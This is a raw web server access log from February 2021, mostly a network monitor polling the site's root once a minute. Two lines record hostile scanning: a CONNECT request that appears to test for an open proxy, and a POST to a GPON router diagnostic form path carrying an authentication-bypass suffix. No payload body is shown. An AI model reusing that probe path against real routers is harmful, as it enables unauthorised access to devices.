112.193.168.191 - - [06/Feb/2021:08:31:15 +0100] "CONNECT cn.bing.com:443 HTTP/1.1" 405 341 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
212.91.246.72 - - [06/Feb/2021:08:31:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.140.188.26 - - [06/Feb/2021:08:31:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [06/Feb/2021:08:32:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.102.76.74 - - [06/Feb/2021:08:33:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Feb/2021:08:33:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:34:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:35:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:37:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.92.80.91 - - [06/Feb/2021:08:38:45 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [06/Feb/2021:08:39:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:40:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:41:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:42:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:43:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Feb/2021:08:44:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
